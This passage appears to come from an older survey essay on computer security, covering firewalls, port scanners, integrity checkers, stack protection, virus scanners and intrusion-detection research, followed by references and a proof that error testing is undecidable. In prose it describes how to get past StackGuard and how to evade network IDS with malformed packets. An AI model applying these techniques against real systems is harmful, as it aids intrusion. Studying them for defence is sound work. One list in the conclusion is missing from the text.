For increased security, a firewall should also hide the details of the local network from outside. This could be done using proxies and denying all outgoing traffic from other hosts. To access a website from inside, a browser would send an HTTP request to the proxy, which would forward it to the website. The proxy would then relay the response back to the browser. In this way, the web server sees only the IP address of the proxy, but no other internal hosts. However, not all clients support proxies, so it is common not to restrict outgoing connections.

Firewalls do not provide complete security. We have already described attacks on mail servers and web servers, which are normally open. Furthermore, if a host is compromised (say, by an email trojan), it is possible to modify the kernel to provide a stealth channel that a firewall would not detect. LOKI2 (Phrack 51-6, 1997) is a program that communicates with a compromised host over a channel disguised as ICMP or DNS traffic and encrypted with Blowfish. Phrack 56-12 (2000) describes how stealth channels can be used to coordinate distributed port scans or SYN flood attacks.

Port Scanners

A port scanner is a program that tests a remote system for common vulnerabilities. Examples are SATAN, strobe, netcat, pscan, ident-scan, and nmap (see Phrack 51-11, 1997). Unfortunately, scanners are commonly used by hackers to search the Internet for vulnerable hosts. It is a good idea to test your system using a scanner before somebody else does. Windows NT should also be tested with QTIP (Phrack 52-10, 1998).

Integrity Testers

When a system is attacked, the attacker will typically insert backdoors in order to maintain control of the system. These are usually hard to detect, such as hidden files or directories with names like ".. " or ".(backspace)(space)". They might also take the form of trojan network server or other program like /bin/ls that opens a root shell when given a special command. Hackers will typically modify system logs to cover their tracks.

Integrity testers like COPS will check for common signs of attack, such as programs that are suid root that shouldn't be. Tripwire performs a cryptograpically secure hash (MD5) of all system files and compares them with an offline list to detect tampering. However, once an attacker gains root, there is no sure means of detection. The twhack program provided in Phrack 51-9 (1997) modifies the kernel to prevent detection by Tripwire. By hooking the file system calls, it is possible to make the file appear normal when reading, but to load the trojan when executing.

If a system is attacked, restoring from backups may not be effective, because the attack may have occurred before the last backup. Restoring the operating system from the original distribution is not certain to succeed either, as there have been cases of backdoors stored in EEPROM on network cards.

Secure Development Tools

Because a major source of vulnerability is defective software, a number of tools have been developed to make software more secure.

We mentioned earlier that suid root shell scripts are insecure. Shell-lock by Cactus Software is a "shell script compiler" that converts a shell script into a binary executable file. However, an analysis by L0pht (advisory 10/4/99) found that Shell-lock simply hides the script using an easily broken encryption method, exposing any vulnerabilities in the original script. Worse yet, the program works by writing the original script to /tmp and running it, exposing it to symbolic link attacks, even if the script itself is secure.

Many buffer overflow attacks might be prevented by using a language that does run time checks, such as Ada, Java, or even shell languages. However, the fact remains that most system software is written in C or C++, which lack these checks.

A number of specialized compilers protect against buffer overflow attacks. Stackguard inserts a random "canary" between the stack variables and return address, and inserts code at the beginning of each function to check that it was not overwritten. Stackshield copies the stack variables to another area, so that a buffer overflow would not touch the return address. Although these help, both methods can be defeated. Essentially, the technique is to use the buffer overflow to overwrite another local pointer, and use that pointer to modify the global offset table so that a pointer to a common system function points at the rogue code. See Phrack 56-5 (2000) for details.

Virus Detection

Virus detectors look for viruses or trojans in files as they are copied onto the computer or are about to be executed. They can also be used to scan a floppy disk or hard drive for suspicious files.

Virus detectors use two methods to check files, signature detection and integrity checking. A signature detector searches for strings within the file that are characteristic of known viruses. Since this does not work on new viruses, a subscription service is needed to keep the virus checker updated. An integrity checker works like Tripwire, detecting file modifications by performing a secure checksum. This detects infection by new viruses, but does not detect viruses in downloaded executables.

Intrusion Detection

Intrusion detection systems (IDS) watch program execution and network traffic to detect intrusions as they happen. The two methods of detection, signature and anomoly detection, are analogous to the two methods of virus detection. A signature detector compares the current activity with the patterns found in known attacks. An anomoly detector searches for any deviation from normal behavior, which might indicate an attack. The system uses machine learning to decide what is "normal".

There is currently a large effort to develop an intelligent IDS at Columbia University, sponsored by DARPA. The work is focused on detecting (but not preventing) four types of attacks.

The DARPA effort is based mainly on anomoly detection. Forrest et. al. (1996) showed that programs make well defined sequences of system calls, which change when the program is compromised, for instance, in a buffer overflow attack. Lee, Stolfo, and Chan (1997) showed that such sequences can be learned by RIPPER, a decision tree generating program, by observing the program (in this case, UNIX sendmail) during normal behavior. No training examples of exploited behavior are needed.

Lee and Stolfo (1998) later applied this technique to network traffic (obtained by TCPDUMP, a packet sniffer), to detect network intrusion, but were able to detect only about 20% of attacks, with a 20% false alarm rate. The test data was generated by DARPA and consisted of 4 GB of data with 30 simulated attacks over several weeks. Lee, Stolfo, and Mok (1999a, 1999b) made some improvements by preprocessing the data before training and by training the system on both normal and attack data (signature detection), obtaining a 37% detection rate and 1.5% false alarm rate on new attacks.

Lee et. al. (2000) then introduced a cost model to optimize the tradeoff between false positives and false negatives. In some cases, it is better to ignore some alarms, as the cost of responding to an attack (for instance, shutting down a service in response to a port scan), is worse than doing nothing. Stolfo et. al. (2000) draws the analogy to detecting credit card fraud, i.e. some small thefts are not worth investigating.

There have been some incremental improvements, such as combining the results of multiple intrusion models (Fan et. al. 2000) and removing noise from the training data (Eskin, 2000).

Other groups have been working on IDS as well. The EMERALD project at SRI (Neumann and Porras, 1999) is a distributed system that combines the results of multiple detectors. Each detector monitors some subset of the network (such as FTP or HTTP on one host) using either anomoly or misuse detection, and the results are combined. EMERALD stands for Event Monitoring Enabling Responses to Anomalous Live Disturbances. It is a successor to NIDES (Next-generation Intrusion Detection Expert System), which is itself a successor to IDES, stemming from work dating to 1983.

The COAST initiative at Purdue University is a major effort on several fronts. COAST stands for Computer Operations, Audit, and Security Technology.

We are still a long way from an acceptable system. Phrack 56-11 (2000) points out some fundamental problems. The false alarm rate from anomoly detection is unacceptably high, and misuse detection (which scans for patterns similar to virus detection) cannot detect new attacks. Worse yet is performance: a packet sniffer can be easily overwhelmed on a network of reasonable size. The most practial solution is to use host level detection, but even this will use significant resources. Their suggestion is to use a strict anomoly model, i.e. define programmatically which traffic is acceptable and which is not, and build the model into the TCP/IP stack.

Phrack 54-12 (1998) suggests attacks on network IDS systems. The idea is to confuse them with bad TCP/IP traffic, possibly uncovering bugs that cause then to crash or at least miss the attacking traffic. Some suggestions were spoofed SYN packets preceeding the real SYN, long IP headers with options, short IP packets that fragment the TCP header, FIN, RST, and data packets with invalid sequence numbers or invalid TCP checksums, SYN packets on an already open connection, and packets with short TTL fields that expire after reaching the IDS but before reaching the host. To handle all of this correctly, the packet sniffer portion of the IDS must be at least as complex as the TCP/IP stack, which increases the probability that it will contain exploitable bugs.

Conclusion

Computer security is an enormously difficult problem for which no simple solution exists. An attacker might exploit a:

There is no general technique for writing error free code. It is not possible, even in theory, to develop a foolproof testing process. It would be equivalent to solving the halting problem (see Appendix A). As software becomes more complex, the security problem will get worse.

So what can be done? It is essential that code be correct to be secure. In practice, we can reduce but not eliminate the risk by the labor intensive process of software testing. The usual practice (unfortunately) is to let the customers do most of the testing, and for the developer to release an unending series of versions and patches.

But this is the wrong kind of testing for security. Users are doing black box testing, i.e. giving the software input and examining the output. We should be doing clear box testing, examining the code and the internal state of the program. This is how hackers discover exploits, by disassembling the code and running it in a debugger. The reason for this is that errors tend to be evenly distributed throughout the code (1 or 2 bugs per 1000 lines), but when the program is running, it will spend most of its time in a very small section. It is this heavily used section that gets tested thoroughly by the user, but it is the seldom used (and incompletely tested) features that are most often exploited by hackers.

Testing software is expensive, so we should take advantage of free labor when it is offered. Port scanners and password crackers were written not just for hackers, but also to allow system administrators to test their own systems for known vulnerabilities. We would be wise to use them. To test for unknown vulnerabilities, we should publish our source code to make it easier for white hat hackers, who will happily test your code for free. It is tempting to hide such information to discourage black hat hackers, but our experience with UNIX and NT suggests that this has the opposite effect. It is the same in cryptology -- in order for a cipher to be trusted, its details must be subject to public analysis.

References

Attrition, www.attrition.org

CERT, www.cert.org

COAST, www.cerias.purdue.edu/coast/

Curry, David A., (1990), Improving the Security of your UNIX System, SRI, ITSTD-721-FR-90-21 www.alw.nih.gov/Security/Docs/unix-security.html

Eskin, Eleazar (2000) ``Anomaly Detection over Noisy Data using Learned Probability Distributions'' ICML00, Palo Alto, CA: July, 2000 www.cs.columbia.edu/ids/publications/

Fan, Wei, Wenke Lee, Sal Stolfo, and Matt Miller (2000) ``A Multiple Model Cost-Sensitive Approach for Intrusion Detection'' Eleventh European Conference on Machine Learning (ECML '00) 2000 www.cs.columbia.edu/ids/publications/

Forrest, S., S. A. Hofmeyr, A. Somayaji, and T. A. Longstaff (1996) "A sense of self for Unix processes", Proceedings of 1996 IEEE Symposium on Computer Security and Privacy (1996). ftp://ftp.cs.unm.edu/pub/forrest/ieee-sp-96-unix.pdf

Lee, Wenke, Sal Stolfo, and Phil Chan (1997) ``Learning Patterns from Unix Process Execution Traces for Intrusion Detection'' AAAI Workshop: AI Approaches to Fraud Detection and Risk Management, July 1997 www.cs.columbia.edu/ids/publications/

Lee, Wenke, and Sal Stolfo (1998) ``Data Mining Approaches for Intrusion Detection'' In Proceedings of the Seventh USENIX Security Symposium (SECURITY '98), San Antonio, TX, January 1998 www.cs.columbia.edu/ids/publications/

Lee, Wenke, Sal Stolfo, and Kui Mok (1998) ``Mining Audit Data to Build Intrusion Detection Models'' In Proceedings of the Fourth International Conference on Knowledge Discovery and Data Mining (KDD '98), New York, NY, August 1998 www.cs.columbia.edu/ids/publications/

Lee, Wenke, Chris Park, and Sal Stolfo (1998) ``Towards Automatic Intrusion Detection using NFR'' In Proceedings of the 1st USENIX Workshop on Intrusion Detection and Network Monitoring, April 1999 www.cs.columbia.edu/ids/publications/

Lee, Wenke, Sal Stolfo, and Kui Mok (1999a) ``A Data Mining Framework for Building Intrusion Detection Models'' In Proceedings of the 1999 IEEE Symposium on Security and Privacy, Oakland, CA, May 1999 www.cs.columbia.edu/ids/publications/

Lee, Wenke, Sal Stolfo, and Kui Mok (1999b) ``Mining in a Data-flow Environment: Experience in Network Intrusion Detection'' In Proceedings of the 5th ACM SIGKDD International Conference on Knowledge Discovery & Data Mining (KDD '99), San Diego, CA, August, 1999 www.cs.columbia.edu/ids/publications/

Lee, Wenke, Matthew Miller, Sal Stolfo, Kahil Jallad, Christoper Park, Erez Zadok, and Vijay Prabhakar (2000) ``Toward Cost-Sensitive Modeling for Intrusion Detection'' Columbia University Computer Science Technical Report CUCS-002-00 www.cs.columbia.edu/ids/publications/

L0pht, www.l0pht.com, has merged with @Stake, www.atstake.com

McAfee, virus protection software, www.mcafee.com

Netcraft, www.netcraft.com

Neumann, Peter G., and Phillip A. Porras (1999) "Experience with EMERALD to Date", SRI International, 1st USENIX Workshop on Intrusion Detection and Network Monitoring Santa Clara, California, 11-12 April 1999, pages 73--80 www.csl.sri.com/neumann/det99.html

Phrack, www.phrack.com

Sal Stolfo, Wei Fan, Wenke Lee, Andreas Prodromidis, and Phil Chan (2000) ``Cost-based Modeling for Fraud and Intrusion Detection: Results from the JAM Project'' In Proceedings of the 2000 DARPA Information Survivability Conference and Exposition (DISCEX '00), 2000 www.cs.columbia.edu/ids/publications/

Security Space, www.securityspace.com

SoPinKy (2000) "Pass to Ring 0 with C/C++", www.rootkit.com/papers/29A-3.2_4.txt

Spafford, Eugene H., (1988) "The Internet Worm Program: An Analysis", Purdue Technical Report CSD-TR-823

Symantec AntiVirus, www.symantec.com

Wolf, Jim (2000), "Government Computer Security Gets Low Grade", Reuters, Sept. 11, dailynews.yahoo.com/h/nm/20000911/ts/tech_security_dc_2.html

Appendix A

Theorem: There is no foolproof algorithm for testing software for errors.

Proof: The proof is similar to the proof of the halting problem, where we substitute error generation for halting. First, suppose there is a function bug(P, x), which returns true if the program P would generate an error on input x, and false otherwise. This leads to a contradiction. Let us write the following program Q:

  Q(P):
    If bug(P, P) then return normally
    Else generate an error
That is, Q returns normally if and only if P crashes when fed its own source code.

Now what does Q(Q) do? If it returns normally, then it must generate an error, but if it generates an error, then it must return normally. This is a contradiction. Thus, our assumption that bug(P, x) exists must be false.